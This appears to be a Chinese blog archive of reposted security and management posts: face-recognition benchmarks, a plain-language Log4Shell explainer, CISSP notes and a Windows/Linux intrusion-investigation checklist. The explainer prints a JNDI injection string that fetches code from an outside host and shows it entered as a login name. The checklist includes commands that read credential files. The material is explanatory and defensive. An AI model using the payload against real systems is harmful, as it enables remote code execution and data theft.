所以目前較新的FRVT(還有持續在更新、接受測驗),包含1:1及1:N,都沒有根據動態影像來做判別,動態影像的關鍵在於每秒多個frame的識別,每張frame雖然都可以被視為一張靜態影像,不過由於frame之間的時間很短,所以演算法除了識別之外,還要針對每張frame進行追蹤,提供識別的效果更好(因為人行進中會有多個角度出現),使得演算法對於角度的識別、跨frame的資訊溝通、系統資源的運用,都必須要更精準、更有效率。

2. 資料庫會影響到地區適用性

NIST是美國的官方機構,所以外界多推測其資料庫在歐美人士臉孔的比例會比較高,這其實也對於以東方臉孔作為主要訓練集的廠商,可能會比較吃虧。不過殘酷的是,其實許多大廠比較有資源,可以找到更多的臉孔訓練集來訓練,這些都是需要投注大量成本。也可以從這個端倪看到,中國AI的市場熱錢很多,讓很多公司都投注資源在參加這些訓練,來展示實力。

3. 測驗環境與真實環境的差異

NIST不再開放GPU使用,只能做CPU使用,而且CPU只用單線程。這樣做可以讓測試環境更加單純,可以更佳的評比出演算法本身的優勢。另外,辨識速度也不是FRVT的重要項目,只要在一定時間內識別出即可,代表FRVT強調的是精準度。

測試中最好與最差的演算法差距在1%左右,而真實環境中,這1%相對顯得不是這麼重要,而是系統的敏捷、穩定性,希望在動態辨識的環境中,可以維持迅速的辨識速度,及系統長期使用的穩定性,才是重要的目標。而GPU是AI應用的重要武器,再加上現在的CPU多線程運算能力越來越強大,所以有些大量識別資料庫的需求,及識別時間上的縮短要求,都可以靠這些技術能力來克服。

不過有一點可以多注意,就是NVRT的資料集條件的多元性,以1:1為例,除了一班的VISA照,還有mugshot、wild等多樣的照片條件,而越極端的資料集,例如wild,更可以比較出演算法在嚴苛條件下,是否還能精準抓取人臉特徵值,無論是以何種方式來矯正,都更能代表真實環境下,常常會出現各式不同角度、明亮程度,這些演算法的適應性。

所以看懂這些報告之後,再看看本篇文章最上方的廠商新聞稿,就瞭解似乎有點誇大。不過作為台灣本土的演算法,在市場環境不明朗之下,要投入資源來參加世界級的比賽本身就很困難,所以整體的表現仍十分值得肯定。

另外,也再分享一個新聞Facial Recognition: The Ugly TruthThe UK is one of the most surveilled countries in the world, with closed-circuit televisions (CCTV) cameras everywhere…www.eetimes.com

eetimes記者Sally Ward-Foxton今年6月的報導指出人臉辨識的『ugly truth』。

英國警察在購物中心、運動場和街道等公共場所進行real-time人臉辨識技術的試驗。根據NEC的說法,其演算法可以容忍質量低下的圖像,例如壓縮的監視視頻,人臉兩眼之間距離只需24像素以上即可作於識別。

不過很可惜的,在某幾次測驗中,有96%被識別出是嫌疑犯的民眾,都是無辜被誤認的。這個代表幾種意義,第一種,嫌疑犯本身的圖像質量太差,第二種,系統的閥值太低,第三種,攝影機所獲取的影像質量太差,第四種,演算法本身不夠好(不過NEC已經是全球名列前茅的技術之一)。

接著,報導也指出人臉辨識大量部署之『道德性』、『合法性』

有許多研究都指出,人臉辨識在有色人種的辨識準確率較低,甚至也有指出女性的辨識準確率也不如男性高。所以技術發展本身可能就造成歧視。

接著,英國法律規定了警察收集指紋和DNA的條件,以及在採集數據後會發生什麼情況,但目前不涵蓋人臉識別圖像和數據。後續只能靠GDPR來做為輔助,不過角色不太一樣,GDPR指的是個人隱私資料,而非專注於生物識別資料的法律。

所以未經人們的同意,並且在他們不知情的情況下,透過街道上的攝影機獲取數據,不分青紅皂白地蒐集人臉圖像,還能定位人員並跟踪他們的動作。這件事本身,將會慢慢醞釀成大型的社會議題。

In the same way that we’ve seen the science of genetically modified foods get set back 10 years because the public in Europe wouldn’t support it, we need to find a path which gets social license to operate.

人臉辨識技術需要找到一條獲得社會許可的途徑,這個是Ada Lovelace Institute副主席Shah所發表的言論,他說目前最好的方式是先暫停這類技術的部署,直到完成整體評估、以及與社會各團體的討論。

資料來源:https://weilihmen.medium.com/%E4%BA%BA%E8%87%89%E8%BE%A8%E8%AD%98-nist-frvt-6d2f063fb159

分類
CISSP

split-response

split-response也可視為一種注入攻擊. 例如, 攻擊者在前端使用JavaScript對web server發出一個含有cookie的HTTP請求 (一般而言, cookie是由server發出), 其中注入惡意旳html內容.
OWASP這篇文章寫的不錯: https://owasp.org/www-community/attacks/HTTP_Response_Splitting

分類
Information Security

從監視攝影機理解 Log4j 跟 Log4Shell 漏洞

2021 年末資安界最大的新聞莫過於 Log4j 的漏洞,編號為 CVE-2021-44228,又被稱為 Log4Shell,甚至被一些人形容為「核彈級漏洞」,可見這個漏洞的影響程度之深遠。

關於技術上的分析已經有很多篇文章在講解了,但對於不懂技術的人來說,可能只知道這個漏洞很嚴重,卻不知道為什麼嚴重,也不知道原理到底是什麼,因此我想從讓非技術背景的人也能理解的角度出發,寫一篇比較白話的文章。

從監視攝影機談起

我有個朋友叫小明,他家是開雜貨店的。就跟其他商店一樣,在店裡有一支監視攝影機,怕有什麼消費糾紛或是有人來搶劫或偷東西,因此讓攝影機 24 小時全程錄影,真的發生什麼事了,就會有證據留存下來。

但攝影機的鏡頭角度有限,不可能把整間店面的影像都拍下來,就算真的都拍下來了,要存的資料也會太多(除非小明很有錢,買了一堆攝影機)。因此,攝影機只會對準一些非常重要、值得記錄下來的地方,像是收銀台等等。

原本這支攝影機用了十幾年都沒什麼事情,畢竟不就是把影像記錄起來嗎,能有什麼事情?但最近卻突然有人發現一個攝影機的隱藏功能(嚴格來講不是隱藏功能,因為攝影機的說明書上其實有提到,可是大家都懶得看那一百多頁的說明書,所以很少人知道這個功能)

這個功能是什麼呢?那就是除了錄影以外,這台監視攝影機還有個智慧圖片辨識的功能,如果它看到特定的影像,會根據影像的內容去執行相對應的動作。舉例來說好了,這個圖片辨識功能需要把指令寫在 100×100 的板子上,一定要黑底白字加上特定格式,像這個樣子:

當攝影機看到上面的圖,符合特定格式,就執行了上面的指令:「關機」,就真的關機了!但關機還沒什麼,指令還可以寫說「把攝影機資料全都給我」之類的,再者,攝影機本來就會即時連線到其他伺服器,這個指令也可以對那些伺服器做操作,例如說把上面的資料全都偷下來等等。

總之呢,一旦讓攝影機拍到指定格式的東西,就會幫你執行指令。

這個功能被爆出來以後,血流成河,因為太多地方都有監視攝影機了,因此許多人都帶著這個板子去看看會不會觸發這個功能。攝影機有分型號,只有一台叫做 log4j 的攝影機會出事,其他不會,但要注意的事情是有些攝影機它雖然不叫做這名字,可其實是從 log4j 作為基底改出來的,就一樣會出事。

而有些東西儘管不是攝影機也會出事,例如說有台智慧冰箱,號稱內部有微型攝影機可以即時監控冰箱內部狀況,恰巧這個微型攝影機就是 log4j 這個型號的攝影機改版出來的,所以也有同樣的問題。

你想想看,如果監視攝影機出了這個問題,那全台灣、全世界這麼多人用這個型號的監視攝影機,當然會引起軒然大波,只要讓攝影機拍到特定的東西就會執行指令,這可嚴重了。

以上是對於 log4j 漏洞的簡單比喻,在這個故事中雜貨店就像是你的網站,而攝影機的功能就是拿來紀錄(log)對於網站的那些請求(request),整個故事只要記兩個重點就好:

  1. log4j 是拿來記錄東西用的
  2. 漏洞原理是只要紀錄某些特定格式的文字,就會觸發一個功能可以執行程式碼

白話的簡易比喻到這邊先結束,想要更了解 log4j,我們就必須先來看看什麼是 log。

有關於 log 這件事

log 的中文翻譯叫做日誌,我相信許多人對這個名詞並不陌生,如果你有跟工程師合作過,他在解決問題時可能會說:「我去看一下 log」;或是如果你們跟合作廠商各執一詞,他說 A 你們說 B,這時候就會說:「不然看一下 log 吧,看看是誰的問題」

當你跟公司的 IT 合作解決電腦上的小問題時,他也會跟你說要去某個地方複製 log 給他,他才知道發生了什麼事情。

log 就像是一台 24 小時全年無休的監視攝影機一樣,需要紀錄起重要事物的狀況。

那為什麼需要有 log 呢?這問題就像是「為什麼要有監視攝影機?」一樣,答案很簡單,因為出事的時候才有證據。就像行車記錄器一樣,裝了以後若不幸發生車禍,就可以協助判斷肇責。

舉個例子,假設我是 A 公司,我們公司是做購物網站的,而通常金流這一塊並不會自己做,而是會找其他做金流的廠商合作,在後端去「串接」金流服務商提供的功能,講白話一點就是:「當使用者要付款時,我把使用者導過去金流廠商的頁面,付款完再導回來我們網站」,相信有在網路上購物的大家應該很熟悉這個流程。

在這個過程中,雙方都必須留下紀錄,確保未來發生問題時有證據可以輔助說明。

例如說有天 A 公司突然接到一堆客訴說沒辦法付款,這時 A 公司直接打電話去金流商,罵說你們這什麼爛服務,怎麼突然壞掉,而金流商此時提供了伺服器的 log,說:「沒有啊,我們這邊從今天早上八點開始就沒有你們導過來的紀錄了,應該是你們的問題吧?」,後來 A 公司檢查了自己這邊的服務,確實是因為今天早上的版本更新出了問題而導致,跟金流商一點關係都沒有。

這就是 log 的重要性,當出事的時候你才有證據可以盤查,才能盡可能還原當初的狀況。

做開發者的大家都知道 log 很重要,所以 log 基本上是必備的,以網站後端來說,他可能會在交易發生錯誤時留下一筆 log,也有可能在發生非預期錯誤時寫下 log,或是用 log 紀錄 request 中的一些欄位,比如說瀏覽器版本好了,給自己公司內部的數據分析系統來使用。

因此 log 是個十分常見的功能。這也是為什麼如果這個功能出事了,造成的後果會非常嚴重。

log4j 是什麼?

在寫網站後端的程式碼時,會有不同的程式語言可以選擇,例如說 Python、JavaScript、PHP 或是 Java 等等,而這些程式語言都會有些專門做 log 的套件,簡單來說就是有人已經幫你把功能都寫好了,你只要用就好了。

而 Java 有一個很好用的 log 套件,就叫做 log4j。而這個套件是隸屬於 Apache 軟體基金會底下,因此全名又叫做 Apache Log4j。

Apache 底下有很多不同的軟體跟套件,例如說:

  • Apache HTTP Server(大家最常看到的是這個)
  • Apache Cassandra
  • Apache Tomcat
  • Apache Hadoop
  • Apache Struts

所以 Apache Server 跟 Apache log4j 完全是不同的兩個東西,我知道你用 Apache Server,跟你有沒有用 log4j 是兩件事情。

這次出問題的套件就是 log4j,而出問題的原因跟我開頭講的一樣,有一個鮮為人知的功能有著安全性的漏洞,只要 log4j 在記錄 log 時記錄到某個特定格式的東西,就會去執行相對應的程式碼,就像開頭提的那個「關機」的板板一樣。

再講更詳細一點,其實並不是直接執行程式碼,那一段特定格式長得像這樣:

${jndi:ldap://cymetrics.io/test}

先不要管那些你看不懂的字,你可以很明顯看到裡面有一段東西很像網址,對,它就是網址,當 log4j 紀錄上面那一串字的時候,它發現這串字符合特定格式,就會去裡面的網址(cymetrics.io/test)下載程式碼然後執行,因此這是一個 RCE(Remote Code Execution,遠端程式碼執行)漏洞。

前面我有提過後端會記錄許多東西,假設今天有個後端服務是用 Java 寫的,而它用 log4j 記錄了使用者登入失敗時輸入的帳號,這時我只要用 ${jndi:ldap://cymetrics.io/test} 這個帳號登入,就能夠觸發 log4j 的漏洞,讓它執行我準備好的程式碼。

只要能執行程式碼,我就可以做很多事情,例如說把伺服器上的資料偷走,或是安裝挖礦軟體幫我挖礦等等。

為什麼這個漏洞如此嚴重?

第一,log4j 這個套件使用的人數極多,只要你有用 Java,幾乎都會用這個套件來紀錄 log

第二,觸發方式容易,你只要在 request 的各個地方塞滿這些有問題的字串,server 只要有記錄下來其中一個,就能夠觸發漏洞,而前面我們有提到紀錄 log 本來就是家常便飯的事情

第三,能造成的影響極大,漏洞被觸發之後就是最嚴重的 RCE,可以直接執行任意程式碼

結合以上這三點,讓它成了一個核彈級的漏洞。到底有多嚴重,看看這些新聞標題就知道:

  1. Apache Log4j 漏洞影響巨大,美國資安主管機關通令政府單位立即修復
  2. 微軟、蘋果都受波及!日誌框架Apache Log4j爆漏洞,堪稱近10年最大資安威脅
  3. 【Log4Shell漏洞資訊更新】Log4j 2.15.0修補不全、Apache再釋2.16.0新版,國家駭客已開始行動

還有一點差點忘了提,有許多其他的軟體也都用了 log4j 這個套件,因此也會有問題,國外有人整理出一份被影響的清單:Log4Shell log4j vulnerability (CVE-2021-44228 / CVE-2021-45046) – cheat-sheet reference guide,洋洋灑灑一大片,像是 Minecraft 這個遊戲的伺服器也有用到 log4j,所以也被這個漏洞給影響。

該怎麼知道我有沒有被這個漏洞影響?

可以先確認自己家的程式有沒有用到 log4j 這個套件以及套件的版本,也需要一併檢查有沒有使用上面那張清單列出來的其他軟體。

如果你是工程師,也可以用一些現有的工具檢測是否受到漏洞影響,像是:log4j-scan 或是 jfrog 提供的 log4j-tools 等等。

或如果真的不知道該如何處理,也可以聯絡我們,看我們可以怎樣幫助你。

該如何修補?

由瑞士 CERT 發表的這篇文章:Zero-Day Exploit Targeting Popular Java Library Log4j 中,有給了一張從各個環節去防禦的圖:

如果來不及把根本原因修掉,可以先上 WAF(Web Application Firewall),簡單來說就是針對網站的防火牆,把那些惡意的字串擋掉,例如說 Cloudflare 就在第一時間增加了 WAF 的規則加以阻擋,不過也有很多人在研究怎麼繞過 WAF 的規則,因此這是治標不治本的做法。

治本的方法就是把 log4j 停用或是升版,升級到不會被這個漏洞影響的版本,但有些時候第一時間的改版可能沒有把漏洞完全補掉,因此記得更新完以後還是要密切注意是否有更新的版本。例如說在這篇文章寫完後過沒多久,官方就釋出了第三個 patch 修復其他相關問題:Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability

結語

一個很多人用的套件,加上一個很常見的功能,再加上一個很簡單的攻擊方式以及嚴重的後果,就成了一個可以被載入史冊的漏洞。

文中有些比喻為了不要講得太細節,會是精簡過後的版本,不一定能完全涵蓋本來的漏洞,在轉換成故事比喻的過程中一定會有一些遺漏的部分,但對於整體的理解我覺得影響不大。

如果你想了解更技術的細節以及時間軸,很推薦這一支影片:Hackers vs. Developers // CVE-2021-44228 Log4Shell,裡面講得很清楚,也探討了開發者與資安從業人員的關係。

最後,希望這篇文章能讓不懂技術的大家更了解 log4shell 是怎樣的漏洞,以及這個漏洞為什麼如此嚴重。文中若有錯誤也請不吝留言指正,感謝。

資料來源:https://tech-blog.cymetrics.io/posts/huli/what-is-log4j-and-log4shell/

分類
CISSP

使用 802.1X 實施網路存取控制中,讓請求者(supplicant)向身份驗證者(authenticator)進行身份驗證且具有最少的系統管理負擔(overhead)的是PEAP協議

https://ithelp.ithome.com.tw/upload/images/20211221/20132160Yd5QGlc3gG.jpg
-VPN 和 EAP
https://ithelp.ithome.com.tw/upload/images/20211221/20132160ktwaFIoa9X.jpg
-EAP 協議比較

803.802.1X 使用基於 EAP 的身份驗證協議讓請求者向身份驗證器進行身份驗證,而 RAIDUS 是身份驗證器(RADIUS 客戶端)和身份驗證服務器(RADIUS 服務器)之間使用的協議。在 802.1X 的設置中不使用 Kerberos。
EAP-TLS 和 PEAP 都可以使用。但是,EAP-TLS 要求在客戶端和 AP 上都安裝證書以支持相互身份驗證。它提供了更高的安全性,但會增加證書管理的開銷。PEAP 重溫開銷;它只需要 AP 安裝證書。

資料來源: Wentz Wu QOTD-20210919

分類
一般

降低領導品質的 8 個壞習慣!業界顧問:好主管不該是「辦公室裡最聰明的人」

身作則是領導者的基本條件,下屬無時無刻都在觀察主管處事待人的方法、從中學習。當領導者有一些不自知的壞習慣,不僅會降低領導品質,更可能破壞團隊和諧、甚至成了員工的壞榜樣。《富比士》(Forbes)雜誌網站邀請 15 名業界資深顧問,分享領導者常見的幾個壞習慣,以及如何避免。

1. 沒留時間給團隊

管理階層的確是頗忙碌,當上主管後一定會被賦予更多任務,會議愈來愈多,但千萬別忙過頭,沒留時間跟團隊好好互動,切記別讓「都是公司害的」成為藉口,每周還是要騰出時間跟團隊開會、了解員工工作狀況,讓部屬有時間跟你討論事情。

2. 沒照顧好自己

當主管工作量雖大,還是得為壓力找個出口、顧好自己的身心健康,照顧好自己才有餘力處理員工的狀況,以免整個團隊群龍無首。建議養成運動習慣或找到固定嗜好,保有平衡的私人時間,才能鍛鍊出更強壯的身心面對工作。

3. 人到心沒到

你是否常在跟員工開會時用筆電做自己的事,或在與員工面談時查看手機訊息?如果有這樣的情形,不只會讓部屬覺得你都沒在專心聆聽,甚至你也會忘記員工跟你講過的話,成為一個搞不清狀況的主管。比較好的做法是,一旦要與人互動,就把時間留給對方,好好參與會議、做筆記。

4. 不曾對員工表達感謝

稽核考核給高分,並不是一種感謝,對員工的感謝是要表達出來的。平日工作的小事或每月、每季、每年年終,都一定要找時機感謝員工的付出,畢竟團隊努力、有好成績,才能凸顯主管的價值。

5. 遲到

主管如果耍大牌,工作或會議上常遲到,容易讓人感到不受尊重,似乎員工的時間比較不重要。

6. 不敢接受反饋

主管不一定就比員工厲害,不管是管理上或工作上,一定有某些部分做得不夠好,如果不敢聽反饋,不僅會讓員工質疑主管的能力,主管也不會進步。帶領團隊,必須建立一套反饋系統,定期跟員工聊聊,或透過線上方式,讓員工針對主管專業能力、溝通、團隊管理等面向反饋真實意見。

7. 資訊不透明

通常主管會比員工更了解公司近況、階段性目標等,這些資訊如果沒布達給員工,員工會像無頭蒼蠅瞎忙,產出不符目標的成品。主管必須記得在第一時間布達最新資訊,以免彼此間資訊有落差,如果遇到敏感話題,但員工也已察覺異狀時,不如誠實以對,畢竟員工也有了解公司事務的權益。

8. 把自己視為「辦公室裡最聰明的人」

許多工作者會因為技術或能力特別突出,而被提拔為管理職,然而一旦升上主管,成為「辦公室裡最聰明的人」就不再是成功的必要條件,好的領導力反而在於提高參與度、合作和成長,多跟員工互動、虛心學習,才有利職涯發展。

除了避免壞習慣,身為領導者最該注意的就是:好好發展領導技能,不是每個人天生都超適合領導,多數時候要從錯誤中學習、觀察別人怎麼做得更好,不斷檢討領導方針,才能成為一個帶領團隊向前邁進的核心人物。

資料來源:https://www.managertoday.com.tw/articles/view/64321?utm_source=line&utm_medium=message–&utm_campaign=64321&utm_content=-

分類
Cissp-WentzWu

20211218-Wuson CISSP Coachs Team聚餐

分類
Project Management

20211218_KK老師-感謝狀

分類
Project Management

20211218_KK老師-Scrum Training

分類
CISSP

數位簽章(digital signature)

https://ithelp.ithome.com.tw/upload/images/20211217/20132160H4mVybcNFs.jpg
-數位簽章
使用您的私鑰加密代碼的指紋或對代碼進行散列並使用您的私鑰加密結果是生成數字簽名的 改寫 。
. 使用 SHA 生成合約的消息驗證碼,確保數據來源的真實性。
. Bob 的公鑰加密的合約摘要不是 Alice 的數字簽名。
. 使用 Diffie-Hellman 同意的密鑰生成合同摘要的密文是一種干擾。Diffie-Hellman 用於密鑰協商/交換而不是加密。
數位簽章可確保不可否認性、數據完整性和真實性。從技術上講,數位簽章只不過是由主體的私鑰簽章的對象的哈希值。
https://ithelp.ithome.com.tw/upload/images/20211217/20132160lJfSz9ompu.jpg
-FISMA的完整性
https://ithelp.ithome.com.tw/upload/images/20211217/20132160iuJgYdCA35.jpg
-FISMA CIA

FIPS 186-4 批准了三種技術:DSA、RSA DSA 和 ECDSA,如下圖所示:
https://ithelp.ithome.com.tw/upload/images/20211217/20132160RLQDNtKKAj.jpg

不可否認性(Non-repudiation)
https://ithelp.ithome.com.tw/upload/images/20211217/20132160Ltsrq2Yzr8.jpg
. 不可否認性具有技術和法律意義。 技術不可否認 可以通過數位簽章實現,而 法律不可否認 是具有法律約束力的。
. 具有法律約束力的數位簽章是電子簽章的一種形式。但是,並非所有數位簽章都具有法律約束力。

參考
不可否認性
CISSP 實踐問題 – 20210320
CISSP 實踐問題 – 20210705

資料來源: Wentz Wu QOTD-20210917

分類
Information Security

Windows/Linux入侵手工排查

本文內容來自於公眾號“FreeBuf”、“Bypass”和其他一些分散內容,著重對幾家內容進行了整合,對這個主題做一個按圖索驥的備查,以防到現場時腦中一片空白。總結得很全面,應該能應付現場的場景了。

一、Windows排查

01、檢查系統賬號

(1)檢查遠程管理端口是否對公網開放,服務器是否存在弱口令。

  • 檢查方法:檢查防火牆映射規則,獲取服務器賬號登錄,也可據實際情況諮詢相關管理員。

(2)查看服務器是否存在可疑賬號、新增賬號。

  • 檢查方法:打開cmd 窗口,輸入lusrmgr.msc命令,查看是否有新增/可疑的賬號,如有管理員群組的(Administrators)裡的新增賬戶,根據實際應用情況,保留或刪除。

(3)查看服務器是否存在隱藏賬號、克隆賬號。

  • 檢查隱藏賬號方法:CMD命令行使用”net user”,看不到”test$”這個賬號,但在控制面板和本地用戶和組是可以顯示此用戶的。
  • 檢查克隆賬號方法:打開註冊表,查看管理員對應鍵值。
  • 使用D盾_web查殺工具,集成了對克隆賬號檢測的功能。
圖片

(4)結合Windows安全日誌,查看管理員登錄時間、用戶名是否存在異常。

  • 檢查方法:Win+R打開運行,輸入“eventvwr.msc”,回車運行,打開“事件查看器”。或者我們可以導出Windows日誌—安全,利用Log Parser進行分析。

02、檢查異常端口

(1)檢查端口連接情況

  • 檢查方法:a、netstat -ano 查看目前的網絡連接,定位可疑的ESTABLISHEDb、根據netstat 定位出的pid,再通過tasklist命令進行進程定位tasklist | findstr “PID”
图片
  • 檢查方法檢查是否存在可疑的網絡連接,如發現異常,可使用Wireshark網絡抓包輔助分析。

03、檢查異常進程

(1)檢查是否存在可疑的進程

  • 檢查方法:a、開始—運行—輸入msinfo32,依次點擊“軟件環境→正在運行任務”就可以查看到進程的詳細信息,比如進程路徑、進程ID、文件創建日期、啟動時間等。b、打開D盾_web查殺工具,進程查看,關注沒有簽名信息的進程。c、通過微軟官方提供的Process Explorer 等工具進行排查。d、查看可疑的進程及其子進程。可以通過觀察以下內容:
    没有签名验证信息的进程没有描述信息的进程进程的属主进程的路径是否合法      CPU或内存资源占用长时间过高的进程

(2)如何找到進程對應的程序位置

        任務管理器—選擇對應進程—右鍵打開文件位置

        運行輸入wmic,cmd界面輸入process

04、檢查啟動項

(1)檢查服務器是否有異常的啟動項。

  • 檢查方法:a、登錄服務器,單擊【開始】>【所有程序】>【啟動】,默認情況下此目錄在是一個空目錄,確認是否有非業務程序在該目錄下。b、單擊開始菜單>【運行】,輸入msconfig,查看是否存在命名異常的啟動項目,是則取消勾選命名異常的啟動項目,並到命令中顯示的路徑刪除文件。c、單擊【開始】>【運行】,輸入regedit,打開註冊表,查看開機啟動項是否正常,特別注意如下三個註冊表項:
    HKEY_CURRENT_USER\software\micorsoft\windows\currentversion\run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runonce檢查右側是否有啟動異常的項目,如有請刪除,並建議安裝殺毒軟件進行病毒查殺,清除殘留病毒或木馬。d、利用安全軟件查看啟動項、開機時間管理等。e、組策略,運行gpedit.msc。

05、檢查計劃任務

(1)檢查計劃任務裡是否有可疑的腳本執行

  • 檢查方法:a、單擊【開始】>【設置】>【控制面板】>【任務計劃】,查看計劃任務屬性,便可以發現木馬文件的路徑。b、單擊【開始】>【運行】;輸入cmd,然後輸入at,檢查計算機與網絡上的其它計算機之間的會話或計劃任務,如有,則確認是否為正常連接。
图片

06、檢查服務

(1)檢查系統服務名稱、描述和路徑,確認是否異常

  • 檢查方法:單擊【開始】>【運行】,輸入services.msc,注意服務狀態和啟動類型,檢查是否有異常服務。
图片

07、檢查可疑文件

(1)檢查新建文件、最近訪問文件和相關下載目錄等

  • 檢查方法:a、 查看用戶目錄,新建賬號會在這個目錄生成一個用戶目錄,查看是否有新建用戶目錄。
    Window 2003 C:\Documents and SettingsWindow 2008R2 C:\Users\b、單擊【開始】>【運行】,輸入%UserProfile%\Recent,分析最近打開分析可疑文件。c、在服務器各個目錄,可根據文件夾內文件列表時間進行排序,查找可疑文件。d、回收站、瀏覽器下載目錄、瀏覽器歷史記錄e、修改時間在創建時間之前的為可疑文件

(2)發現一個WEBSHELL或遠控木馬的創建時間,如何找出同一時間範圍內創建的文件?

  • 檢查方法:a、利用Registry Workshop 註冊表編輯器的搜索功能,可以找到最後寫入時間區間的文件。b、利用計算機自帶文件搜索功能,指定修改時間進行搜索。

08、檢查系統日誌

(1)檢查系統安全日誌

一般來說,可以通過檢查Windows安全日誌來獲悉賬號登錄情況,比如成功/失敗的次數。

LogParser.exe  -i:EVT –o:DATAGRID "SELECT  EXTRACT_TOKEN(Strings,10,'|')  as EventType, EXTRACT_TOKEN(Strings,5,'|')  as user, count(EXTRACT_TOKEN(Strings,19,'|')) as Times,EXTRACT_TOKEN(Strings,19,'|')  as LoginIp FROM F:\security.evtx where EventID=4625 GROUP BY Strings"图片

(2)歷史命令記錄

高版本Powershell會記錄PowerShell的命令,所有的PowerShell命令將會保存在固定位置:

%appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

查看PowerShell歷史記錄:

Get-Content (Get-PSReadlineOption).HistorySavePath

默認Powershell v5支持,Powershell v3和Powershell v4,需要安裝Get-PSReadlineOption後才可以使用。

二、Linux入侵排查

01、檢查系統賬號

從攻擊者的角度來說,入侵者在入侵成功後,往往會留下後門以便再次訪問被入侵的系統,而創建系統賬號是一種比較常見的後門方式。在做入侵排查的時候,用戶配置文件/etc/passwd和密碼配置文件/etc/shadow是需要去重點關注的地方。

(1)查詢特權用戶特權用戶(uid 為0)

awk -F: '$3==0{print $1}' /etc/passwd

(2)查詢可以遠程登錄的帳號信息

awk '/\$1|\$6/{print $1}' /etc/shadow

(3)除root帳號外,其他帳號是否存在sudo權限。如非管理需要,普通帳號應刪除sudo權限

more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"

(4)禁用或刪除多餘及可疑的帳號

usermod -L user    禁用帐号,帐号无法登录,/etc/shadow第二栏为!开头userdel user       删除user用户userdel -r user    将删除user用户,并且将/home目录下的user目录一并删除

(5)當前登錄當前系統的用戶信息

who     查看当前登录用户(tty本地登陆  pts远程登录)w       查看系统信息,想知道某一时刻用户的行为uptime  查看登陆多久、多少用户,负载

02、檢查異常端口

(1)使用netstat 網絡連接命令,分析可疑端口、IP、PID等信息。

netstat -antlp|more

(2)如發現異常的網絡連接需要持續觀察,可抓包分析

tcpdump -c 10 -q   //精简模式显示 10个包

03、檢查可疑進程

(1)使用ps命令列出系統中當前運行的那些進程,分析異常的進程名、PID,可疑的命令行等。

ps aux / ps -ef

(2)通過top命令顯示系統中各個進程的資源佔用狀況,如發現資源佔用過高

top

(3)如發現異常,可使用一下命令進一步排查:

查看该进程启动的完整命令行: ps eho command -p $PID查看该进程启动时候所在的目录: readlink /proc/$PID/cwd查看下pid所对应的进程文件路径:ls -l /proc/$PID/exe查看该进程启动时的完整环境变量: strings -f /proc/1461/environ | cut -f2 -d ''列出该进程所打开的所有文件: lsof -p $PID

04、檢查系統服務

Linux系統服務管理,CentOS7使用systemd控制 CentOS6之前使用chkconfig控制。

(1)對於systemd服務管理器來說,可以通過下述方式查看開機自啟的服務:

systemctl list-unit-files --type=service | grep "enabled"

(2)chkconfig就是CentOS6以前用來控制系統服務的工具,查看服務自啟動狀態:

chkconfig  --list  chkconfig --list | grep "3:on\|5:on"

05、檢查開機啟動項

(1)檢查啟動項腳本

more /etc/rc.local /etc/rc.d/rc[0~6].d ls -l /etc/rc.d/rc3.d/

(2)例子:當我們需要開機啟動自己的腳本時,只需要將可執行腳本丟在/etc/init.d目錄下,然後在/etc/rc.d/rc*.d中建立軟鏈接即可

ln -s /etc/init.d/sshd /etc/rc.d/rc3.d/S100ssh

此處sshd是具體服務的腳本文件,S100ssh是其軟鏈接,S開頭代表加載時自啟動;如果是K開頭的腳本文件,代表運行級別加載時需要關閉的。

06、檢查計劃任務

利用計劃任務進行權限維持,可作為一種持久性機制被入侵者利用。檢查異常的計劃任務,需要重點關注以下目錄中是否存在惡意腳本。

/var/spool/cron/* /etc/crontab/etc/cron.d/*/etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/*/etc/cron.weekly//etc/anacrontab/var/spool/anacron/*

07、檢查異常文件

1、查看敏感目錄,如/tmp目錄下的文件,同時注意隱藏文件夾,以“..”為名的文件夾具有隱藏屬性

2、得到發現WEBSHELL、遠控木馬的創建時間,如何找出同一時間範圍內創建的文件?

可以使用find命令来查找,如 find /opt -iname "*" -atime 1 -type f 找出 /opt 下一天前访问过的文件

3、針對可疑文件可以使用stat進行創建修改時間。

4、可能會被替換的命令為:ps、netstat、lsof、ss等常用命令,這些命令一般會被黑客放在/usr/bin/dpkg目錄下。如果我們發現存在此目錄,基本上可以斷定係統被入侵了。

08、檢查歷史命令

一般而言,入侵者獲取shell之後,會執行一些系統命令從而在主機上留下痕跡,我們可以通過history命令查詢shell命令的執行歷史。

(1)查詢某個用戶在系統上執行了什麼命令

使用root用户登录系统,检查/home目录下的用户主目录的.bash_history文件

(2)默認情況下,系統可以保存1000條的歷史命令,並不記錄命令執行的時間,根據需要進行安全加固。

a)保存1万条命令sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profileb)在/etc/profile的文件尾部添加如下行数配置信息:######jiagu history xianshi#########USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'`if [ "$USER_IP" = "" ]thenUSER_IP=`hostname`fiexport HISTTIMEFORMAT="%F %T $USER_IP `whoami` "shopt -s histappendexport PROMPT_COMMAND="history -a"######### jiagu history xianshi ##########c)source /etc/profile让配置生效

09、檢查系統日誌

在Linux上一般跟系統相關的日誌默認都會放到/var/log下面,若是一旦出現問題,用戶就可以通過查看日誌來迅速定位,及時解決問題。常用日誌文件如下:

/var/log/btmp:记录错误登录日志,这个文件是二进制文件,不能直接vi查看,而要使用lastb命令查看。/var/log/lastlog:记录系统中所有用户最后一次登录时间的日志,这个文件是二进制文件,不能直接vi,而要使用lastlog命令查看。/var/log/wtmp:永久记录所有用户的登录、注销信息,同时记录系统的启动、重启、关机事件。同样这个文件也是一个二进制文件,不能直接vi,而需要使用last命令来查看。/var/log/utmp:记录当前已经登录的用户信息,这个文件会随着用户的登录和注销不断变化,只记录当前登录用户的信息。同样这个文件不能直接vi,而要使用w,who,users等命令来查询。/var/log/secure:记录验证和授权方面的信息,只要涉及账号和密码的程序都会记录,比如SSH登录,su切换用户,sudo授权,甚至添加用户和修改用户密码都会记录在这个日志文件中

